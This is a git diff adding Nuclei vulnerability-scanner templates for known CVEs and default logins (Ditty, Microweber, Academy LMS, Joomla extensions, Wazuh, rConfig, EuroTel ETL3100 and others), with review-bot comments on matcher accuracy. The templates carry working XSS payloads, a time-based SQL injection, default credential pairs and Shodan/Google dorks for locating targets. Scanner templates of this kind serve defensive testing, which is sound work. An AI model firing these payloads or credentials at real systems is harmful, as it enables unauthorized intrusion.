@@ -0,0 +1,44 @@ +id: CVE-2023-4148 +info: + name: Ditty < 3.1.25 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The Ditty WordPress plugin before 3.1.25 does not sanitise and escape some parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin. + remediation: Fixed in version 3.1.25 + reference: + - https://wpscan.com/vulnerability/aa39de78-55b3-4237-84db-6fdf6820c58d + - https://nvd.nist.gov/vuln/detail/CVE-2023-4148 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + cve-id: CVE-2023-4148 + cpe: cpe:2.3:a:metaphorcreations:ditty:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/ditty-news-ticker/" + tags: cve,cve2023,ditty-news-ticker,wordpress,wp-plugin,wpscan,wp,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/edit.php?post_type=ditty&page=ditty_export&tab=export_ditty&"> HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_2, "") && contains(body_2, "ditty")' + - 'contains(content_type_2, "text/html")' + condition: and diff --git a/http/cves/2023/CVE-2023-41538.yaml b/http/cves/2023/CVE-2023-41538.yaml new file mode 100644 index 0000000000..ce036128bc --- /dev/null +++ b/http/cves/2023/CVE-2023-41538.yaml 
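Review bot: This file drops the blank line between `id: CVE-2023-4148` and `info:` that every other template in this change has, and orders `cwe-id` before `cve-id` under `classification` where the neighbouring files put `cve-id` first; both are worth normalising before merge so the templates diff cleanly against each other. The `authenticated` tag is correct for the `wp-login.php` chain, but a one-line comment above the second request noting that it depends on the session cookie from the first (`cookie-reuse: true`) would make the two-step structure obvious.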
@@ -0,0 +1,34 @@ +id: CVE-2023-41538 + +info: + name: PHPJabbers PHP Forum Script 3.0 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + PhpJabbers PHP Forum Script 3.0 is vulnerable to Cross Site Scripting (XSS) via the keyword parameter. + reference: + - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Forum-Script-3.0 + - https://nvd.nist.gov/vuln/detail/CVE-2023-41538 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-41538 + cwe-id: CWE-79 + cpe: cpe:2.3:a:phpjabbers:php_forum_script:3.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + tags: cve,cve2023,xss,phpjabber,jabber + +http: + - method: GET + path: + - "{{BaseURL}}/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESC&keyword=%22>" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "New Question", ">")' + condition: and diff --git a/http/cves/2023/CVE-2023-4168.yaml b/http/cves/2023/CVE-2023-4168.yaml new file mode 100644 index 0000000000..62f06d4cd2 --- /dev/null +++ b/http/cves/2023/CVE-2023-4168.yaml 
@@ -0,0 +1,34 @@ +id: CVE-2023-4168 + +info: + name: Adlisting Classified Ads 2.14.0 - Information Disclosure + author: r3Y3r53 + severity: high + description: | + Information disclosure issue in the redirect responses, When accessing any page on the website, Sensitive data, such as API keys, server keys, and app IDs, is being exposed in the body of these redirects. + reference: + - https://www.exploit-db.com/exploits/51667 + - https://templatecookie.com/demo/adlisting-classified-ads-script + - https://nvd.nist.gov/vuln/detail/CVE-2023-4168 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-4168 + cwe-id: CWE-200 + metadata: + verified: true + max-request: 1 + tags: cve,cve2023,adlisting,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword=" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "google_map_key", "api_key", "auth_domain")' + condition: and diff --git a/http/cves/2023/CVE-2023-4547.yaml b/http/cves/2023/CVE-2023-4547.yaml new file mode 100644 index 0000000000..b41c287f5b --- /dev/null +++ b/http/cves/2023/CVE-2023-4547.yaml 
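Review bot: The matcher requires `status_code == 200`, but the description says the keys are exposed "in the body of these redirects", i.e. in a 3xx response; nuclei does not follow redirects unless `host-redirects` is set, so if the leak really lives in the redirect body the 200 check can never be satisfied, and if it lives on the landing page the description is wrong. Either match the redirect itself (`- 'status_code == 301 || status_code == 302'`) or add `host-redirects: true` and reword the description to say the keys appear on the final page. The query string also repeats `keyword`, `lat` and `long`; trimming the duplicates makes the request easier to read and to recognise in access logs.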
@@ -0,0 +1,43 @@ +id: CVE-2023-4547 + +info: + name: SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting + author: theamanrawat + severity: medium + description: | + A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability. + reference: + - https://spa-cart.com + - https://cxsecurity.com/ascii/WLB-2023080090 + - https://nvd.nist.gov/vuln/detail/CVE-2023-4547 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 3.5 + cve-id: CVE-2023-4547 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2023,spa-cart,unauth,xss + +http: + - method: GET + path: + - '{{BaseURL}}/search?filtered=1&q=test&filter[price]=100-1331">&filter[attr][Memory][]=16+GB' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '100-1331">' + - '' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-4974.yaml b/http/cves/2023/CVE-2023-4974.yaml new file mode 100644 index 0000000000..9ce606d1d7 --- /dev/null +++ b/http/cves/2023/CVE-2023-4974.yaml 
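Review bot: The `classification` block is internally inconsistent: `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` is a full-impact, PR:L vector, yet `cvss-score: 3.5`, `severity: medium`, `cwe-id: CWE-79` and the `unauth` tag describe a low-impact unauthenticated reflected XSS. Either the vector or the score is wrong and they must agree with each other and with the cited advisory; every other XSS template in this change uses `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N` with `cvss-score: 6.1`. `verified: "true"` is a quoted string where every other file uses the boolean `true`; write `verified: true` so tooling that reads the field as a boolean treats it the same way.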
@@ -0,0 +1,36 @@ +id: CVE-2023-4974 + +info: + name: Academy LMS 6.2 - SQL Injection + author: theamanrawat + severity: medium + description: | + A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. + reference: + - https://demo.creativeitem.com/academy/ + - https://packetstormsecurity.com/files/174681/Academy-LMS-6.2-SQL-Injection.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-4974 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L + cvss-score: 6.3 + cve-id: CVE-2023-4974 + cwe-id: CWE-89 + metadata: + verified: true + shodan-query: html:"Academy LMS" + tags: cve,cve2023,sqli,academy,lms + +http: + - raw: + - | + @timeout: 20s + GET /tutor/filter?searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - duration>=7 + - status_code == 500 + - contains(body, "Courses") + condition: and diff --git a/http/cves/2023/CVE-2023-5244.yaml b/http/cves/2023/CVE-2023-5244.yaml new file mode 100644 index 0000000000..3bcba330ae --- /dev/null +++ b/http/cves/2023/CVE-2023-5244.yaml 
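Review bot: The DSL entries are written as plain scalars (`- duration>=7`, `- status_code == 500`) while every other DSL list in this change single-quotes its expressions; quoting them (`- 'duration>=7'`) keeps the file consistent and protects against a future expression that starts with a YAML-significant character. `cvss-metrics` uses the `CVSS:3.0` prefix where the rest of the page uses `CVSS:3.1`; use 3.1 unless the cited source only publishes a 3.0 vector. With `condition: and`, the 7-second delay must coincide with `status_code == 500`, so an instance that delays but answers 200 is missed — if the 500 is a property of the demo instance rather than of the vulnerability, `duration>=7` plus `contains(body, "Courses")` is the more portable signal, and a comment should say which it is.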
@@ -0,0 +1,36 @@ +id: CVE-2023-5244 + +info: + name: Microweber < V.2.0 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Reflected Cross-Site Scripting Vulnerability in types GET parameter on the /editor_tools/rte_image_editor endpoint. + reference: + - https://huntr.dev/bounties/a3bd58ba-ca59-4cba-85d1-799f73a76470/ + - https://vuldb.com/?id.240778 + - https://nvd.nist.gov/vuln/detail/CVE-2023-5244 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + cve-id: CVE-2023-5244 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:780351152 + tags: cve,cve2023,xss,microweber + +http: + - method: GET + path: + - "{{BaseURL}}/editor_tools/rte_image_editor?types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "alert(document.domain)", "microweber")' + condition: and diff --git a/http/default-logins/batflat/batflat-default-login.yaml b/http/default-logins/batflat/batflat-default-login.yaml new file mode 100644 index 0000000000..5b4ddefdb2 --- /dev/null +++ b/http/default-logins/batflat/batflat-default-login.yaml 
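Review bot: `contains_all(body, "alert(document.domain)", "microweber")` matches whenever the `types` value is echoed anywhere in the page, including HTML- or JS-escaped, because the bare `alert(document.domain)` substring survives most encodings. Assert the breakout the payload depends on rather than the function call alone — the decoded fragment `';});alert(document.domain);$(picker)` as it would have to appear inside the script — so an encoded echo does not register as a hit. The `classification` block also lists `cwe-id` before `cve-id`, unlike the neighbouring files.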
@@ -0,0 +1,41 @@ +id: batflat-default-login + +info: + name: Batflat CMS - Default Login + author: r3Y3r53 + severity: high + description: | + Batflat CMS is vulnerable to default login vulnerability that most commonly affects devices having some pre-set (default) administrative credentials to access all configuration settings. + reference: + - https://www.exploitalert.com/view-details.html?id=34749 + - https://cxsecurity.com/issue/WLB-2020010100 + metadata: + google-query: intext:"Powered by Batflat." + verified: true + tags: default-login,batflat + +http: + - raw: + - | + POST /admin/ HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}}&login= + + attack: pitchfork + payloads: + username: + - "admin" + password: + - "admin" + + cookie-reuse: true + host-redirects: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "Batflat - Dashboard")' + condition: and diff --git a/http/default-logins/eurotel/etl3100-default-login.yaml b/http/default-logins/eurotel/etl3100-default-login.yaml new file mode 100644 index 0000000000..0c47f04677 --- /dev/null +++ b/http/default-logins/eurotel/etl3100-default-login.yaml 
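Review bot: The raw request line reads `POST /admin/ HTTP/2`, whereas every other raw request in this change uses `HTTP/1.1`; unless HTTP/2 is deliberately required by the target, the version token should be `POST /admin/ HTTP/1.1`, since a raw request is parsed as an HTTP/1.x message and the `HTTP/2` token is at best ignored and at worst rejected. The description ("vulnerable to default login vulnerability that most commonly affects devices …") is a generic definition; a sentence naming the `admin`/`admin` pair the template tries and the `Batflat - Dashboard` marker it looks for would document the check itself.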
@@ -0,0 +1,46 @@ +id: etl3100-default-login + +info: + name: EuroTel ETL3100 - Default Login + author: r3Y3r53 + severity: high + description: | + The TV and FM transmitter uses a weak set of default administrative credentials that can be guessed in remote password attacks and gain full control of the system. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5782.php + - https://www.exploit-db.com/exploits/51684 + metadata: + max-request: 2 + verified: true + shodan-query: html:"ETL3100" + fofa-query: body="ETL3100" + tags: misconfig,default-login,eurotel + +http: + - raw: + - | + POST /index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + txtUserId={{username}}&txtPassword={{password}}&btnLogin=Login + + - | + GET /exciter.php HTTP/1.1 + Host: {{Hostname}} + + attack: pitchfork + payloads: + username: + - user + - operator + password: + - etl3100rt1234 + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains_all(body_2, "FM Exciter", "Summary", "/logout.php")' + condition: and diff --git a/http/default-logins/franklin-fueling-default-login.yaml b/http/default-logins/franklin-fueling-default-login.yaml new file mode 100644 index 0000000000..e02b79673c --- /dev/null +++ b/http/default-logins/franklin-fueling-default-login.yaml 
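Review bot: `attack: pitchfork` pairs the payload lists index by index and stops when the shortest list is exhausted, so with two usernames (`user`, `operator`) and one password only `user`/`etl3100rt1234` is ever sent and `operator` is dead data. Either list the password twice so each username gets a partner, or switch to `attack: clusterbomb` so every username is tried against the password; with clusterbomb the two-request chain runs twice and `max-request` becomes `4`. franklin-fueling-default-login has the same shape (three usernames, one password, pitchfork) and needs the same decision.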
@@ -0,0 +1,42 @@ +id: franklin-fueling-default-login + +info: + name: Franklin Fueling System Default Login - Detect + author: r3Y3r53 + severity: high + description: | + A default password vulnerability refers to a security flaw that arises when a system or device is shipped or set up with a pre-configured, default password that is commonly known or easily guessable. + reference: + - https://www.exploitalert.com/view-details.html?id=39466 + metadata: + google-query: inurl:"relay_status.html" + verified: true + max-request: 1 + tags: default-login,franklin + +http: + - raw: + - | + POST /21408623/cgi-bin/tsaws.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + + + + attack: pitchfork + payloads: + username: + - roleAdmin + - roleUser + - roleGuest + password: + - admin + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/xml")' + - 'contains(body, "roleAdmin") || contains(body, "roleUser") || contains(body, "roleGuest")' + condition: and diff --git a/http/default-logins/rconfig-default-login.yaml b/http/default-logins/rconfig-default-login.yaml new file mode 100644 index 0000000000..994dee0526 --- /dev/null +++ b/http/default-logins/rconfig-default-login.yaml 
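Review bot: As rendered here, the POST to `/21408623/cgi-bin/tsaws.cgi` declares `Content-Type: text/xml` but carries no body, so `{{username}}` and `{{password}}` from `payloads` are never sent and the template degenerates to "the endpoint answers with XML mentioning a role"; if the XML body was stripped when this diff was rendered, confirm the file's body references both variables. The body matcher `contains(body, "roleAdmin") || contains(body, "roleUser") || contains(body, "roleGuest")` is also true for a login-failure response that echoes the submitted role, so a token that appears only after successful authentication would be a safer signal. The `name` (`Franklin Fueling System Default Login - Detect`) does not follow the `<Product> - Default Login` pattern of the other default-login templates, and the description is a textbook definition of default passwords rather than a statement about this product.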
@@ -0,0 +1,56 @@ +id: rconfig-default-login + +info: + name: rConfig - Default Login + author: theamanrawat + severity: high + description: | + rConfig contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://github.com/rconfig/rconfig + metadata: + verified: true + shodan-query: http.title:"rConfig" + tags: rconfig,default-login + +http: + - raw: + - | + GET /login.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&pass={{password}}&sublogin=1 + + attack: pitchfork + payloads: + username: + - "admin" + password: + - "admin" + + cookie-reuse: true + host-redirects: true + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - "Logged in as" + - "rConfig - Configuration Management" + - "dashboadFieldSet" + condition: and + + - type: word + part: header_2 + words: + - text/html + + - type: status + part: header_2 + status: + - 200 diff --git a/http/default-logins/timekeeper/timekeeper-default-login.yaml b/http/default-logins/timekeeper/timekeeper-default-login.yaml new file mode 100644 index 0000000000..870ff70cb5 --- /dev/null +++ b/http/default-logins/timekeeper/timekeeper-default-login.yaml 
@@ -0,0 +1,44 @@ +id: timekeeper-default-login + +info: + name: TimeKeeper - Default Login + author: theamanrawat + severity: high + description: | + TimeKeeper contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://fsmlabs.com + metadata: + verified: true + shodan-query: http.favicon.hash:2134367771 + max-request: 1 + tags: timekeeper,default-login + +http: + - raw: + - | + GET /login?arg1={{url_encode(base64(username))}}&arg2={{url_encode(base64(password))}} HTTP/1.1 + Host: {{Hostname}} + + attack: pitchfork + payloads: + username: + - "admin" + password: + - "timekeeper" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "%7B%20%22username%22%20%3A%20%22admin%22%2C%20%22result%22%3A%20%22OK%22" + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/default-logins/wazuh-default-login.yaml b/http/default-logins/wazuh-default-login.yaml new file mode 100644 index 0000000000..ad6fdf7510 --- /dev/null +++ b/http/default-logins/wazuh-default-login.yaml 
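Review bot: The word matcher hard-codes the expected username (`%22username%22%20%3A%20%22admin%22`), so the template is silently tied to the single `admin` payload and will stop matching for any username later added to the `payloads` list. Matching on the account-independent success fragment, `%22result%22%3A%20%22OK%22`, keeps the matcher aligned with the payload list. The credentials travel in the query string of a GET (`/login?arg1=…&arg2=…`) and therefore end up in server and proxy access logs; that is the product's interface rather than a template choice, but it deserves a sentence in the description.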
@@ -0,0 +1,67 @@ +id: wazuh-default-login + +info: + name: Wazuh - Default Login + author: theamanrawat + severity: high + description: | + Wazuh contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://documentation.wazuh.com/current/user-manual/user-administration/password-management.html + - https://wazuh.com + metadata: + verified: true + shodan-query: title:"Wazuh" + max-request: 2 + tags: wazuh,default-login + +http: + - raw: + - | + GET /app/login?nextUrl=%2Fapp%2Fwazuh HTTP/1.1 + Host: {{Hostname}} + + - | + POST /auth/login HTTP/1.1 + Host: {{Hostname}} + Osd-Version: {{osd}} + Content-Type: application/json + + {"username":"{{username}}","password":"{{password}}"} + + attack: pitchfork + payloads: + username: + - "admin" + - "wazuh" + password: + - "admin" + - "wazuh" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"username":' + - '"roles":' + condition: and + + - type: word + part: header + words: + - 'application/json' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + name: osd + group: 1 + regex: + - '"version":"([0-9.]+)"' + internal: true diff --git a/http/exposed-panels/unibox-panel.yaml b/http/exposed-panels/unibox-panel.yaml new file mode 100644 index 0000000000..6f26f562d8 --- /dev/null +++ b/http/exposed-panels/unibox-panel.yaml 
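Review bot: `attack: pitchfork` with `username: [admin, wazuh]` and `password: [admin, wazuh]` tries exactly two pairs, `admin`/`admin` and `wazuh`/`wazuh`; if the cross combinations were intended the mode should be `clusterbomb`, and either way `max-request: 2` should count requests actually sent (two per pair, so `4` with pitchfork) if that is how the repository computes it. The second word matcher lists a single word yet carries `condition: and`, which is a no-op and can be dropped. The `osd` extractor has no `part` and so reads the body; a comment saying that it pulls the `"version"` value from the login page to populate `Osd-Version` on the second request would save the next reader the lookup.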
@@ -0,0 +1,37 @@ +id: unibox-panel + +info: + name: Unibox Panel - Detect + author: theamanrawat + severity: info + description: Unibox Administrator panel was detected. + metadata: + verified: true + shodan-query: http.favicon.hash:176427349 + max-request: 1 + tags: panel,unibox,login + +http: + - method: GET + path: + - '{{BaseURL}}' + + host-redirects: true + max-redirects: 3 + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Unibox Administration' + - 'Please Login to continue' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/exposures/logs/redv-super-logs.yaml b/http/exposures/logs/redv-super-logs.yaml new file mode 100644 index 0000000000..f8ac508bc0 --- /dev/null +++ b/http/exposures/logs/redv-super-logs.yaml @@ -0,0 +1,26 @@ +id: redv-super-logs + +info: + name: RED-V Super Digital Signage System RXV-A740R - Log Information Disclosure + author: r3Y3r53 + severity: medium + description: | + The application is vulnerable to sensitive information disclosure vulnerability. An unauthenticated attacker can visit several endpoints and disclose the webserver's log file list containing sensitive system resources and debug log information running on the device. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5609.php + metadata: + verified: true + tags: redv,log,disclosure,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/downloader.log" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/plain")' + - 'contains_all(body, "Log file", "[LogParser]", "[INFO]")' + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/joomla/joomla-com-booking-component.yaml b/http/vulnerabilities/joomla/joomla-com-booking-component.yaml new file mode 100644 index 0000000000..7899d30b69 --- /dev/null +++ b/http/vulnerabilities/joomla/joomla-com-booking-component.yaml 
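Review bot: The redv-super-logs metadata lacks the `max-request` field that every sibling template in this batch carries; add `max-request: 1` under `metadata`. The file also ends without a trailing newline (`\ No newline at end of file`), which yamllint flags. The matcher itself, status plus `text/plain` plus the three log markers, is specific enough.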
@@ -0,0 +1,30 @@ +id: joomla-com-booking-component + +info: + name: Joomla! com_booking component 2.4.9 - Information Leak + author: r3Y3r53 + severity: high + description: | + Joomla! com_booking component suffers from Information leak vulnerability in which sensitive or confidential data is unintentionally exposed or made accessible to unauthorized individuals or systems. + reference: + - https://www.exploit-db.com/exploits/51595 + - http://www.artio.net/downloads/joomla/book-it/book-it-2-free/download + metadata: + google-query: inurl:"index.php?option=com_booking" + verified: true + max-request: 1 + tags: joomla,info-leak,unauth + +http: + - raw: + - | + GET /index.php?option=com_booking&controller=customer&task=getUserData&id=123 HTTP/1.1 + + host-redirects: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "name") && contains(body, "username") && contains(body, "email")' + - 'contains(content_type, "text/html")' + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/joomla/joomla-iproperty-real-estate-xss.yaml b/http/vulnerabilities/joomla/joomla-iproperty-real-estate-xss.yaml new file mode 100644 index 0000000000..2e69af89f5 --- /dev/null +++ b/http/vulnerabilities/joomla/joomla-iproperty-real-estate-xss.yaml 
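Review bot: The raw request carries no `Host: {{Hostname}}` line, unlike every other raw request in this batch; nuclei most likely fills Host from the target, but the inconsistency is worth fixing, e.g. add `Host: {{Hostname}}` after the GET line. The success condition (status 200, `text/html`, and the words `name`, `username`, `email` somewhere in the body) will match a large share of ordinary HTML pages, so the false-positive rate is likely high; anchoring on a marker specific to the com_booking JSON/HTML output would be tighter. The description also does not say which response data is exposed, which would help triage.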
@@ -0,0 +1,34 @@ +id: joomla-iproperty-xss + +info: + name: Joomla iProperty Real Estate 4.1.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Joomla extension iproperty is vulnerable to XSS in GET parameter 'filter_keyword'. + reference: + - https://www.exploit-db.com/exploits/51640 + - https://cxsecurity.com/issue/WLB-2023070076 + - https://extensions.joomla.org/extension/vertical-markets/real-estate/iproperty/ + metadata: + verified: true + max-request: 1 + tags: joomla,xss,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/iproperty/property-views/all-properties-with-map?filter_keyword=pihil%22onmouseover=%22alert(document.domain)%22style=%22position:absolute;width:100%;height:100%;top:0;left:0;%22f63m4&option=com_iproperty&view=allproperties&ipquicksearch=1" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'onmouseover="alert(document.domain)"style=' + - 'real estate' + condition: and + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/joomla/joomla-joombri-careers-xss.yaml b/http/vulnerabilities/joomla/joomla-joombri-careers-xss.yaml new file mode 100644 index 0000000000..e55775a1a8 --- /dev/null +++ b/http/vulnerabilities/joomla/joomla-joombri-careers-xss.yaml 
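Review bot: The path `/iproperty/property-views/all-properties-with-map` is a site-specific Joomla SEF alias, so the template will report nothing (false negative) on installations whose menu items are named differently even though the component is the same; the query string already carries `option=com_iproperty&view=allproperties`, which is the installation-independent form, and the description should at least state the assumption. The body word `real estate` is a weak second anchor; a com_iproperty-specific marker would be better.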
@@ -0,0 +1,29 @@ +id: joomla-joombri-careers-xss + +info: + name: Joomla JoomBri Careers 3.3.0 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials. + reference: + - https://packetstormsecurity.com/files/168641/Joomla-JoomBri-Careers-3.3.0-Cross-Site-Scripting.html + - https://cxsecurity.com/issue/WLB-2022100024 + - https://extensions.joomla.org/ + metadata: + verified: true + max-request: 1 + tags: xss,joomla,joombri + +http: + - method: GET + path: + - "{{BaseURL}}/for-jobseekers/search-jobs?keyword=l9x1q%22onfocus%3D%22alert(document.domain)%22autofocus%3D%22ak5aghi5u9p" + + matchers: + - type: dsl + dsl: + - 'contains(body, "alert(document.domain)") && contains(body, "Joomla") && contains(tolower(body), "joombri")' + - 'contains(content_type, "text/html")' + - 'status_code == 200' + condition: and diff --git a/http/vulnerabilities/joomla/joomla-jvtwitter-xss.yaml b/http/vulnerabilities/joomla/joomla-jvtwitter-xss.yaml new file mode 100644 index 0000000000..42d3006a01 --- /dev/null +++ b/http/vulnerabilities/joomla/joomla-jvtwitter-xss.yaml 
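Review bot: `contains(body, "alert(document.domain)")` also matches a server that reflects the parameter HTML-escaped, since escaping changes the quotes but not the parentheses, so this will flag patched or properly encoding installations as vulnerable; assert the unescaped attribute context instead, as the sibling solidres template does, e.g. `contains(body, "\"onfocus=\"alert(document.domain)\"autofocus")`. The path `/for-jobseekers/search-jobs` is also a site-specific SEF alias, which should be documented as an assumption in the description.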
@@ -0,0 +1,32 @@ +id: joomla-jvtwitter-xss + +info: + name: Joomla JVTwitter - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials. + reference: + - https://buaq.net/go-44433.html + - https://cxsecurity.com/issue/WLB-2020110041 + - https://extensions.joomla.org/ + metadata: + max-request: 1 + verified: true + google-query: inurl:mod_jvtwitter/jvtwitter.php?id= + tags: joomla,jvtwitter,xss + +http: + - method: GET + path: + - "{{BaseURL}}/modules/mod_jvtwitter/jvtwitter.php?id=%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain);%3E" + - "{{BaseURL}}/modules/mod_jvtwitter/jvtwitter.php?id=" + + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(content_type_1, "text/html")' + - 'contains(body_1, ">") && contains(body, "TEP STOP")' + - 'contains(content_type, "text/html")' + condition: and diff --git a/http/vulnerabilities/joomla/joomla-solidres-xss.yaml b/http/vulnerabilities/joomla/joomla-solidres-xss.yaml new file mode 100644 index 0000000000..dcd742b952 --- /dev/null +++ b/http/vulnerabilities/joomla/joomla-solidres-xss.yaml 
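Review bot: The dsl mixes indexed variables (`status_code_1`, `content_type_1`, `body_1`) with unindexed ones (`body`, `content_type`), which makes it unclear which of the two responses each line is meant to check; use `body_2` and `content_type_2` explicitly for the second request. As shown, `contains(body_1, ">")` is satisfied by practically any HTML page — if the intended string was stripped when this page was rendered, ignore this, otherwise the first request's check should assert the full reflected probe.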
@@ -0,0 +1,39 @@ +id: joomla-solidres-xss + +info: + name: Joomla Solidres 2.13.3 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Joomla extension for Solidres - Online Booking System & Reservation Software is vulnerable to XSS in GET parameter 'show'. + reference: + - https://www.exploit-db.com/exploits/51638 + - https://cxsecurity.com/issue/WLB-2023070080 + - https://cyberlegion.io/joomla-solidres-2-13-3-cross-site-scripting/ + metadata: + verified: true + max-request: 1 + tags: xss,joomla,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show=db8ck%22onfocus=%22confirm(document.domain)%22autofocus=%22xwu0k" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'onfocus="confirm(document.domain)"autofocus' + - 'com_solidres' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/other/applezeed-sqli.yaml b/http/vulnerabilities/other/applezeed-sqli.yaml new file mode 100644 index 0000000000..d87489cd06 --- /dev/null +++ b/http/vulnerabilities/other/applezeed-sqli.yaml 
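Review bot: The path `/joomla/greenery_hub/index.php/en/hotels/reservations` is clearly copied from a test installation (a `/joomla/` subdirectory, a `greenery_hub` site, an `/en/` language prefix), so the template will miss almost every real deployment; the non-SEF form using the `option`/`task` values already present in the query is installation-independent, and the description should state which part of the path is assumed. The body matcher on the unescaped `onfocus="confirm(document.domain)"autofocus` plus `com_solidres` is a good, low-false-positive check.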
